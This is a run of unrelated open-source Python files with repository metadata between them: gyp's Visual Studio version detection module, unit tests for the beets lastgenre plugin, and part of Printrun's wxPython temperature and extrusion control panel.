module = self._modules[module_name]
if module.category() in groups:
groups[module.category()].append(module)
else:
groups[module.category()]= [module]
# sort by module name
for category in groups:
group = groups[category]
groups[category] = sorted(group, key=lambda x: x.name())
return groups
|
rafaeltomesouza/frontend-class1
|
refs/heads/master
|
aula2/a11/linkedin/client/.gradle/yarn/node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py
|
1509
|
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Handle version information related to Visual Stuio."""
import errno
import os
import re
import subprocess
import sys
import gyp
import glob
class VisualStudioVersion(object):
"""Information regarding a version of Visual Studio."""
def __init__(self, short_name, description,
solution_version, project_version, flat_sln, uses_vcxproj,
path, sdk_based, default_toolset=None):
self.short_name = short_name
self.description = description
self.solution_version = solution_version
self.project_version = project_version
self.flat_sln = flat_sln
self.uses_vcxproj = uses_vcxproj
self.path = path
self.sdk_based = sdk_based
self.default_toolset = default_toolset
def ShortName(self):
return self.short_name
def Description(self):
"""Get the full description of the version."""
return self.description
def SolutionVersion(self):
"""Get the version number of the sln files."""
return self.solution_version
def ProjectVersion(self):
"""Get the version number of the vcproj or vcxproj files."""
return self.project_version
def FlatSolution(self):
return self.flat_sln
def UsesVcxproj(self):
"""Returns true if this version uses a vcxproj file."""
return self.uses_vcxproj
def ProjectExtension(self):
"""Returns the file extension for the project."""
return self.uses_vcxproj and '.vcxproj' or '.vcproj'
def Path(self):
"""Returns the path to Visual Studio installation."""
return self.path
def ToolPath(self, tool):
"""Returns the path to a given compiler tool. """
return os.path.normpath(os.path.join(self.path, "VC/bin", tool))
def DefaultToolset(self):
"""Returns the msbuild toolset version that will be used in the absence
of a user override."""
return self.default_toolset
def SetupScript(self, target_arch):
"""Returns a command (with arguments) to be used to set up the
environment."""
# Check if we are running in the SDK command line environment and use
# the setup script from the SDK if so. |target_arch| should be either
# 'x86' or 'x64'.
assert target_arch in ('x86', 'x64')
sdk_dir = os.environ.get('WindowsSDKDir')
if self.sdk_based and sdk_dir:
return [os.path.normpath(os.path.join(sdk_dir, 'Bin/SetEnv.Cmd')),
'/' + target_arch]
else:
# We don't use VC/vcvarsall.bat for x86 because vcvarsall calls
# vcvars32, which it can only find if VS??COMNTOOLS is set, which it
# isn't always.
if target_arch == 'x86':
if self.short_name >= '2013' and self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
# VS2013 and later, non-Express have a x64-x86 cross that we want
# to prefer.
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), 'amd64_x86']
# Otherwise, the standard x86 compiler.
return [os.path.normpath(
os.path.join(self.path, 'Common7/Tools/vsvars32.bat'))]
else:
assert target_arch == 'x64'
arg = 'x86_amd64'
# Use the 64-on-64 compiler if we're not using an express
# edition and we're running on a 64bit OS.
if self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
arg = 'amd64'
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), arg]
def _RegistryQueryBase(sysdir, key, value):
"""Use reg.exe to read a particular key.
While ideally we might use the win32 module, we would like gyp to be
python neutral, so for instance cygwin python lacks this module.
Arguments:
sysdir: The system subdirectory to attempt to launch reg.exe from.
key: The registry key to read from.
value: The particular value to read.
Return:
stdout from reg.exe, or None for failure.
"""
# Skip if not on Windows or Python Win32 setup issue
if sys.platform not in ('win32', 'cygwin'):
return None
# Setup params to pass to and attempt to launch reg.exe
cmd = [os.path.join(os.environ.get('WINDIR', ''), sysdir, 'reg.exe'),
'query', key]
if value:
cmd.extend(['/v', value])
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Obtain the stdout from reg.exe, reading to the end so p.returncode is valid
# Note that the error text may be in [1] in some cases
text = p.communicate()[0]
# Check return code from reg.exe; officially 0==success and 1==error
if p.returncode:
return None
return text
def _RegistryQuery(key, value=None):
r"""Use reg.exe to read a particular key through _RegistryQueryBase.
First tries to launch from %WinDir%\Sysnative to avoid WoW64 redirection. If
that fails, it falls back to System32. Sysnative is available on Vista and
up and available on Windows Server 2003 and XP through KB patch 942589. Note
that Sysnative will always fail if using 64-bit python due to it being a
virtual directory and System32 will work correctly in the first place.
KB 942589 - http://support.microsoft.com/kb/942589/en-us.
Arguments:
key: The registry key.
value: The particular registry value to read (optional).
Return:
stdout from reg.exe, or None for failure.
"""
text = None
try:
text = _RegistryQueryBase('Sysnative', key, value)
except OSError, e:
if e.errno == errno.ENOENT:
text = _RegistryQueryBase('System32', key, value)
else:
raise
return text
def _RegistryGetValueUsingWinReg(key, value):
"""Use the _winreg module to obtain the value of a registry key.
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure. Throws
ImportError if _winreg is unavailable.
"""
import _winreg
try:
root, subkey = key.split('\\', 1)
assert root == 'HKLM' # Only need HKLM for now.
with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, subkey) as hkey:
return _winreg.QueryValueEx(hkey, value)[0]
except WindowsError:
return None
def _RegistryGetValue(key, value):
"""Use _winreg or reg.exe to obtain the value of a registry key.
Using _winreg is preferable because it solves an issue on some corporate
environments where access to reg.exe is locked down. However, we still need
to fallback to reg.exe for the case where the _winreg module is not available
(for example in cygwin python).
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure.
"""
try:
return _RegistryGetValueUsingWinReg(key, value)
except ImportError:
pass
# Fallback to reg.exe if we fail to import _winreg.
text = _RegistryQuery(key, value)
if not text:
return None
# Extract value.
match = re.search(r'REG_\w+\s+([^\r]+)\r\n', text)
if not match:
return None
return match.group(1)
def _CreateVersion(name, path, sdk_based=False):
"""Sets up MSVS project generation.
Setup is based off the GYP_MSVS_VERSION environment variable or whatever is
autodetected if GYP_MSVS_VERSION is not explicitly specified. If a version is
passed in that doesn't match a value in versions python will throw a error.
"""
if path:
path = os.path.normpath(path)
versions = {
'2015': VisualStudioVersion('2015',
'Visual Studio 2015',
solution_version='12.00',
project_version='14.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v140'),
'2013': VisualStudioVersion('2013',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2013e': VisualStudioVersion('2013e',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2012': VisualStudioVersion('2012',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2012e': VisualStudioVersion('2012e',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2010': VisualStudioVersion('2010',
'Visual Studio 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2010e': VisualStudioVersion('2010e',
'Visual C++ Express 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2008': VisualStudioVersion('2008',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2008e': VisualStudioVersion('2008e',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005': VisualStudioVersion('2005',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005e': VisualStudioVersion('2005e',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
}
return versions[str(name)]
def _ConvertToCygpath(path):
"""Convert to cygwin path if we are using cygwin."""
if sys.platform == 'cygwin':
p = subprocess.Popen(['cygpath', path], stdout=subprocess.PIPE)
path = p.communicate()[0].strip()
return path
def _DetectVisualStudioVersions(versions_to_check, force_express):
"""Collect the list of installed visual studio versions.
Returns:
A list of visual studio versions installed in descending order of
usage preference.
Base this on the registry and a quick check if devenv.exe exists.
Only versions 8-10 are considered.
Possibilities are:
2005(e) - Visual Studio 2005 (8)
2008(e) - Visual Studio 2008 (9)
2010(e) - Visual Studio 2010 (10)
2012(e) - Visual Studio 2012 (11)
2013(e) - Visual Studio 2013 (12)
2015 - Visual Studio 2015 (14)
Where (e) is e for express editions of MSVS and blank otherwise.
"""
version_to_year = {
'8.0': '2005',
'9.0': '2008',
'10.0': '2010',
'11.0': '2012',
'12.0': '2013',
'14.0': '2015',
}
versions = []
for version in versions_to_check:
# Old method of searching for which VS version is installed
# We don't use the 2010-encouraged-way because we also want to get the
# path to the binaries, which it doesn't offer.
keys = [r'HKLM\Software\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Microsoft\VCExpress\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VCExpress\%s' % version]
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], 'InstallDir')
if not path:
continue
path = _ConvertToCygpath(path)
# Check for full.
full_path = os.path.join(path, 'devenv.exe')
express_path = os.path.join(path, '*express.exe')
if not force_express and os.path.exists(full_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version],
os.path.join(path, '..', '..')))
# Check for express.
elif glob.glob(express_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..', '..')))
# The old method above does not work when only SDK is installed.
keys = [r'HKLM\Software\Microsoft\VisualStudio\SxS\VC7',
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\SxS\VC7']
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], version)
if not path:
continue
path = _ConvertToCygpath(path)
if version != '14.0': # There is no Express edition for 2015.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..'), sdk_based=True))
return versions
def SelectVisualStudioVersion(version='auto', allow_fallback=True):
"""Select which version of Visual Studio projects to generate.
Arguments:
version: Hook to allow caller to force a particular version (vs auto).
Returns:
An object representing a visual studio project format version.
"""
# In auto mode, check environment variable for override.
if version == 'auto':
version = os.environ.get('GYP_MSVS_VERSION', 'auto')
version_map = {
'auto': ('14.0', '12.0', '10.0', '9.0', '8.0', '11.0'),
'2005': ('8.0',),
'2005e': ('8.0',),
'2008': ('9.0',),
'2008e': ('9.0',),
'2010': ('10.0',),
'2010e': ('10.0',),
'2012': ('11.0',),
'2012e': ('11.0',),
'2013': ('12.0',),
'2013e': ('12.0',),
'2015': ('14.0',),
}
override_path = os.environ.get('GYP_MSVS_OVERRIDE_PATH')
if override_path:
msvs_version = os.environ.get('GYP_MSVS_VERSION')
if not msvs_version:
raise ValueError('GYP_MSVS_OVERRIDE_PATH requires GYP_MSVS_VERSION to be '
'set to a particular version (e.g. 2010e).')
return _CreateVersion(msvs_version, override_path, sdk_based=True)
version = str(version)
versions = _DetectVisualStudioVersions(version_map[version], 'e' in version)
if not versions:
if not allow_fallback:
raise ValueError('Could not locate Visual Studio installation.')
if version == 'auto':
# Default to 2005 if we couldn't find anything
return _CreateVersion('2005', None)
else:
return _CreateVersion(version, None)
return versions[0]
|
andremiller/beets
|
refs/heads/master
|
test/test_lastgenre.py
|
1
|
# This file is part of beets.
# Copyright 2015, Fabrice Laporte.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'lastgenre' plugin."""
from mock import Mock
import _common
from _common import unittest
from beetsplug import lastgenre
from beets import config
from helper import TestHelper
class LastGenrePluginTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.plugin = lastgenre.LastGenrePlugin()
def tearDown(self):
self.teardown_beets()
def _setup_config(self, whitelist=False, canonical=False, count=1):
config['lastgenre']['canonical'] = canonical
config['lastgenre']['count'] = count
if isinstance(whitelist, (bool, basestring)):
# Filename, default, or disabled.
config['lastgenre']['whitelist'] = whitelist
self.plugin.setup()
if not isinstance(whitelist, (bool, basestring)):
# Explicit list of genres.
self.plugin.whitelist = whitelist
def test_default(self):
"""Fetch genres with whitelist and c14n deactivated
"""
self._setup_config()
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues')
def test_c14n_only(self):
"""Default c14n tree funnels up to most common genre except for *wrong*
genres that stay unchanged.
"""
self._setup_config(canonical=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'Iota Blues')
def test_whitelist_only(self):
"""Default whitelist rejects *wrong* (non existing) genres.
"""
self._setup_config(whitelist=True)
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_whitelist_c14n(self):
"""Default whitelist and c14n both activated result in all parents
genres being selected (from specific to common).
"""
self._setup_config(canonical=True, whitelist=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues, Blues')
def test_whitelist_custom(self):
"""Keep only genres that are in the whitelist.
"""
self._setup_config(whitelist=set(['blues', 'rock', 'jazz']),
count=2)
self.assertEqual(self.plugin._resolve_genres(['pop', 'blues']),
'Blues')
self._setup_config(canonical='', whitelist=set(['rock']))
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_count(self):
"""Keep the n first genres, as we expect them to be sorted from more to
less popular.
"""
self._setup_config(whitelist=set(['blues', 'rock', 'jazz']),
count=2)
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'rock', 'blues']),
'Jazz, Rock')
def test_count_c14n(self):
"""Keep the n first genres, after having applied c14n when necessary
"""
self._setup_config(whitelist=set(['blues', 'rock', 'jazz']),
canonical=True,
count=2)
# thanks to c14n, 'blues' superseeds 'country blues' and takes the
# second slot
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'country blues', 'rock']),
'Jazz, Blues')
def test_c14n_whitelist(self):
"""Genres first pass through c14n and are then filtered
"""
self._setup_config(canonical=True, whitelist=set(['rock']))
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_empty_string_enables_canonical(self):
"""For backwards compatibility, setting the `canonical` option
to the empty string enables it using the default tree.
"""
self._setup_config(canonical='', count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
def test_empty_string_enables_whitelist(self):
"""Again for backwards compatibility, setting the `whitelist`
option to the empty string enables the default set of genres.
"""
self._setup_config(whitelist='')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_no_duplicate(self):
"""Remove duplicated genres.
"""
self._setup_config(count=99)
self.assertEqual(self.plugin._resolve_genres(['blues', 'blues']),
'Blues')
def test_tags_for(self):
class MockPylastElem(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
class MockPylastObj(object):
def get_top_tags(self):
tag1 = Mock()
tag1.weight = 90
tag1.item = MockPylastElem(u'Pop')
tag2 = Mock()
tag2.weight = 40
tag2.item = MockPylastElem(u'Rap')
return [tag1, tag2]
plugin = lastgenre.LastGenrePlugin()
res = plugin._tags_for(MockPylastObj())
self.assertEqual(res, [u'pop', u'rap'])
res = plugin._tags_for(MockPylastObj(), min_weight=50)
self.assertEqual(res, [u'pop'])
def test_get_genre(self):
MOCK_GENRES = {'track': u'1', 'album': u'2', 'artist': u'3'}
def mock_fetch_track_genre(self, obj=None):
return MOCK_GENRES['track']
def mock_fetch_album_genre(self, obj):
return MOCK_GENRES['album']
def mock_fetch_artist_genre(self, obj):
return MOCK_GENRES['artist']
lastgenre.LastGenrePlugin.fetch_track_genre = mock_fetch_track_genre
lastgenre.LastGenrePlugin.fetch_album_genre = mock_fetch_album_genre
lastgenre.LastGenrePlugin.fetch_artist_genre = mock_fetch_artist_genre
self._setup_config(whitelist=False)
item = _common.item()
item.genre = MOCK_GENRES['track']
config['lastgenre'] = {'force': False}
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'keep'))
config['lastgenre'] = {'force': True, 'source': 'track'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (MOCK_GENRES['track'], 'track'))
config['lastgenre'] = {'source': 'album'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (MOCK_GENRES['album'], 'album'))
config['lastgenre'] = {'source': 'artist'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (MOCK_GENRES['artist'], 'artist'))
MOCK_GENRES['artist'] = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'original'))
config['lastgenre'] = {'fallback': 'rap'}
item.genre = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (config['lastgenre']['fallback'].get(),
'fallback'))
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
dob71/x2swn
|
refs/heads/master
|
printrun/gui/controls.py
|
1
|
# This file is part of the Printrun suite.
#
# Printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import wx
from .xybuttons import XYButtons, XYButtonsMini
from .zbuttons import ZButtons, ZButtonsMini
from .graph import Graph
from .widgets import TempGauge
from wx.lib.agw.floatspin import FloatSpin
from .utils import make_button, make_custom_button
class XYZControlsSizer(wx.GridBagSizer):
def __init__(self, root, parentpanel = None):
super(XYZControlsSizer, self).__init__()
if not parentpanel: parentpanel = root.panel
root.xyb = XYButtons(parentpanel, root.moveXY, root.homeButtonClicked, root.spacebarAction, root.bgcolor, zcallback=root.moveZ)
self.Add(root.xyb, pos = (0, 1), flag = wx.ALIGN_CENTER)
root.zb = ZButtons(parentpanel, root.moveZ, root.bgcolor)
self.Add(root.zb, pos = (0, 2), flag = wx.ALIGN_CENTER)
root.hottgauge = {}
wx.CallAfter(root.xyb.SetFocus)
def add_extra_controls(self, root, parentpanel, extra_buttons = None, mini_mode = False):
standalone_mode = extra_buttons is not None
base_line = (3 if root.display_graph else 2)
e_base_line = base_line + 4
gauges_base_line = e_base_line + 2
gauge_lines = root.settings.extruders if root.display_gauges else 1
tempdisp_line = gauges_base_line + gauge_lines + 1
pos_mapping = {
"tempgraph": (base_line - 1, 0),
"ext_controls": (base_line + 0, 0),
"htemp_label": (base_line + 1, 0),
"htemp_val": (base_line + 1, 1),
"htemp_set": (base_line + 1, 2),
"htemp_off": (base_line + 1, 3),
"btemp_label": (base_line + 2, 0),
"btemp_val": (base_line + 2, 1),
"btemp_set": (base_line + 2, 2),
"btemp_off": (base_line + 2, 3),
"speedcontrol": (base_line + 3, 0),
"esettings": (e_base_line + 0, 0),
"edist_label": (0, 0),
"edist_val": (1, 0),
"edist_unit": (1, 1),
"efeed_label": (0, 2),
"efeed_val": (1, 2),
"efeed_unit": (1, 3),
"ebuttons": (e_base_line + 1, 0),
"extrude": (0, 1),
"reverse": (0, 2),
"chktemp": (0, 3),
"htemp_gauge0": (gauges_base_line, 0),
"btemp_gauge": (gauges_base_line + gauge_lines, 0),
"tempdisp": (tempdisp_line, 0),
}
for i in range(1, root.settings.extruders):
pos_mapping["htemp_gauge" + str(i)] = (gauges_base_line + i, 0)
span_mapping = {
"tempgraph": (1, 6),
"ext_controls": (1, 6),
"htemp_label": (1, 1),
"htemp_off": (1, 1),
"htemp_val": (1, 1),
"htemp_set": (1, 1),
"btemp_label": (1, 1),
"btemp_off": (1, 1),
"btemp_val": (1, 1),
"btemp_set": (1, 1),
"esettings": (1, 5),
"speedcontrol": (1, 5),
"htemp_gauge0": (1, 6),
"htemp_gauge1": (1, 6),
"htemp_gauge2": (1, 6),
"btemp_gauge": (1, 6),
"tempdisp": (1, 6),
"ebuttons": (1, 4),
"extrude": (1, 1),
"reverse": (1, 1),
"chktemp": (1, 1),
}
def add(name, widget, *args, **kwargs):
kwargs["pos"] = pos_mapping[name]
if name in span_mapping:
kwargs["span"] = span_mapping[name]
if "container" in kwargs:
container = kwargs["container"]
del kwargs["container"]
else:
container = self
container.Add(widget, *args, **kwargs)
# Border between cotrols groups
off_top = 5
# Hotend & bed temperatures #
# Hotend temp
add("htemp_label", wx.StaticText(parentpanel, -1, _("Heat:")), flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT | wx.TOP, border = off_top)
htemp_choices = [root.temps[i] + " (" + i + ")" for i in sorted(root.temps.keys(), key = lambda x:root.temps[x])]
root.settoff = make_button(parentpanel, _("Off"), lambda e: root.do_settemp("off"), _("Switch Hotend Off"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.settoff)
add("htemp_off", root.settoff, flag = wx.TOP, border = off_top)
if root.settings.last_temperature not in map(float, root.temps.values()):
htemp_choices = [str(root.settings.last_temperature)] + htemp_choices
root.htemp = wx.ComboBox(parentpanel, -1, choices = htemp_choices,
style = wx.CB_DROPDOWN, size = (200, -1))
root.htemp.SetToolTip(wx.ToolTip(_("Select Temperature for Hotend")))
root.htemp.Bind(wx.EVT_COMBOBOX, root.htemp_change)
add("htemp_val", root.htemp, flag = wx.TOP, border = off_top)
root.settbtn = make_button(parentpanel, _("Set"), root.do_settemp, _("Switch Hotend On"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.settbtn)
add("htemp_set", root.settbtn, flag = wx.EXPAND | wx.TOP, border = off_top)
# Bed temp
add("btemp_label", wx.StaticText(parentpanel, -1, _("Bed: ")), flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT)
btemp_choices = [root.bedtemps[i] + " (" + i + ")" for i in sorted(root.bedtemps.keys(), key = lambda x:root.bedtemps[x])]
root.setboff = make_button(parentpanel, _("Off"), lambda e: root.do_bedtemp("off"), _("Switch Heated Bed Off"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.setboff)
add("btemp_off", root.setboff)
if root.settings.last_bed_temperature not in map(float, root.bedtemps.values()):
btemp_choices = [str(root.settings.last_bed_temperature)] + btemp_choices
root.btemp = wx.ComboBox(parentpanel, -1, choices = btemp_choices,
style = wx.CB_DROPDOWN, size = (200, -1))
root.btemp.SetToolTip(wx.ToolTip(_("Select Temperature for Heated Bed")))
root.btemp.Bind(wx.EVT_COMBOBOX, root.btemp_change)
add("btemp_val", root.btemp)
root.setbbtn = make_button(parentpanel, _("Set"), root.do_bedtemp, _("Switch Heated Bed On"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.setbbtn)
add("btemp_set", root.setbbtn, flag = wx.EXPAND)
root.btemp.SetValue(str(root.settings.last_bed_temperature))
root.htemp.SetValue(str(root.settings.last_temperature))
# added for an error where only the bed would get (pla) or (abs).
# This ensures, if last temp is a default pla or abs, it will be marked so.
# if it is not, then a (user) remark is added. This denotes a manual entry
for i in btemp_choices:
if i.split()[0] == str(root.settings.last_bed_temperature).split('.')[0] or i.split()[0] == str(root.settings.last_bed_temperature):
root.btemp.SetValue(i)
for i in htemp_choices:
if i.split()[0] == str(root.settings.last_temperature).split('.')[0] or i.split()[0] == str(root.settings.last_temperature):
root.htemp.SetValue(i)
if '(' not in root.btemp.Value:
root.btemp.SetValue(root.btemp.Value + ' (user)')
if '(' not in root.htemp.Value:
root.htemp.SetValue(root.htemp.Value + ' (user)')
# Speed control #
speedpanel = root.newPanel(parentpanel)
speedsizer = wx.BoxSizer(wx.HORIZONTAL)
speedsizer.Add(wx.StaticText(speedpanel, -1, _("Print speed:")), flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT)
root.speed_slider = wx.Slider(speedpanel, -1, 100, 1, 300)
speedsizer.Add(root.speed_slider, 1, flag = wx.EXPAND)
root.speed_spin = FloatSpin(speedpanel, -1, value = 100, min_val = 1, max_val = 300, digits = 0, style = wx.ALIGN_LEFT, size = (60, -1))
speedsizer.Add(root.speed_spin, 0, flag = wx.ALIGN_CENTER_VERTICAL)
root.speed_label = wx.StaticText(speedpanel, -1, _("%"))
speedsizer.Add(root.speed_label, flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT)
def speedslider_set(event):
root.do_setspeed()
root.speed_setbtn.SetBackgroundColour(wx.NullColour)
root.speed_setbtn = make_button(speedpanel, _("Set"), speedslider_set, _("Set print speed factor"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.speed_setbtn)
speedsizer.Add(root.speed_setbtn, flag = wx.ALIGN_CENTER)
speedpanel.SetSizer(speedsizer)
add("speedcontrol", speedpanel, flag = wx.EXPAND | wx.TOP | wx.BOTTOM, border = off_top)
def speedslider_spin(event):
value = root.speed_spin.GetValue()
root.speed_setbtn.SetBackgroundColour("red")
root.speed_slider.SetValue(value)
root.speed_spin.Bind(wx.EVT_SPINCTRL, speedslider_spin)
def speedslider_scroll(event):
value = root.speed_slider.GetValue()
root.speed_setbtn.SetBackgroundColour("red")
root.speed_spin.SetValue(value)
root.speed_slider.Bind(wx.EVT_SCROLL, speedslider_scroll)
# Temperature gauges #
def hotendgauge_scroll_setpoint(e):
rot = e.GetWheelRotation()
if rot > 0:
root.do_settemp(str(root.hsetpoint + 1))
elif rot < 0:
root.do_settemp(str(max(0, root.hsetpoint - 1)))
def bedgauge_scroll_setpoint(e):
rot = e.GetWheelRotation()
if rot > 0:
root.do_bedtemp(str(root.bsetpoint + 1))
elif rot < 0:
root.do_bedtemp(str(max(0, root.bsetpoint - 1)))
if root.display_gauges:
for i in range(0, root.settings.extruders):
root.hottgauge[i] = TempGauge(parentpanel, size = (-1, 24), title = _("Heater" + str(i) +":"), maxval = 300, bgcolor = root.bgcolor)
add("htemp_gauge" + str(i), root.hottgauge[i], flag = wx.EXPAND)
root.hottgauge[i].Bind(wx.EVT_MOUSEWHEEL, hotendgauge_scroll_setpoint)
else:
root.hottgauge[0] = TempGauge(parentpanel, size = (-1, 24), title = _("Heater:"), maxval = 300, bgcolor = root.bgcolor)
add("htemp_gauge0", root.hottgauge[0], flag = wx.EXPAND)
root.hottgauge[0].Bind(wx.EVT_MOUSEWHEEL, hotendgauge_scroll_setpoint)
root.bedtgauge = TempGauge(parentpanel, size = (-1, 24), title = _("Bed:"), maxval = 150, bgcolor = root.bgcolor)
add("btemp_gauge", root.bedtgauge, flag = wx.EXPAND)
root.bedtgauge.Bind(wx.EVT_MOUSEWHEEL, bedgauge_scroll_setpoint)
# Temperature (M105) feedback display #
root.tempdisp = wx.StaticText(parentpanel, -1, "", style = wx.ST_NO_AUTORESIZE)
def on_tempdisp_size(evt):
root.tempdisp.Wrap(root.tempdisp.GetSize().width)
root.tempdisp.Bind(wx.EVT_SIZE, on_tempdisp_size)
def tempdisp_setlabel(label):
wx.StaticText.SetLabel(root.tempdisp, label)
root.tempdisp.Wrap(root.tempdisp.GetSize().width)
root.tempdisp.SetSize((-1, root.tempdisp.GetBestSize().height))
root.tempdisp.SetLabel = tempdisp_setlabel
add("tempdisp", root.tempdisp, flag = wx.EXPAND)
# Temperature graph #
if root.display_graph:
root.graph = Graph(parentpanel, wx.ID_ANY, root)
add("tempgraph", root.graph, flag = wx.EXPAND | wx.ALL, border = 5)
root.graph.Bind(wx.EVT_LEFT_DOWN, root.graph.show_graph_window)
# Extrusion controls #
# Extrusion settings
esettingspanel = root.newPanel(parentpanel)
esettingssizer = wx.GridBagSizer()
esettingssizer.SetEmptyCellSize((0, 0))
root.edist = FloatSpin(esettingspanel, -1, value = root.settings.last_extrusion, min_val = 0, max_val = 1000, size = (70, -1), digits = 1)
root.edist.SetBackgroundColour((225, 200, 200))
root.edist.SetForegroundColour("black")
root.edist.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.edist.Bind(wx.EVT_TEXT, root.setfeeds)
add("edist_label", wx.StaticText(esettingspanel, -1, _("Length:")), container = esettingssizer, flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, border = 5)
add("edist_val", root.edist, container = esettingssizer, flag = wx.ALIGN_CENTER | wx.RIGHT, border = 5)
unit_label = _("mm") if mini_mode else _("mm @")
add("edist_unit", wx.StaticText(esettingspanel, -1, unit_label), container = esettingssizer, flag = wx.ALIGN_CENTER | wx.RIGHT, border = 5)
root.edist.SetToolTip(wx.ToolTip(_("Amount to Extrude or Retract (mm)")))
if not mini_mode:
root.efeedc = FloatSpin(esettingspanel, -1, value = root.settings.e_feedrate, min_val = 0, max_val = 50000, size = (70, -1), digits = 1)
root.efeedc.SetToolTip(wx.ToolTip(_("Extrude / Retract speed (mm/min)")))
root.efeedc.SetBackgroundColour((225, 200, 200))
root.efeedc.SetForegroundColour("black")
root.efeedc.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.efeedc.Bind(wx.EVT_TEXT, root.setfeeds)
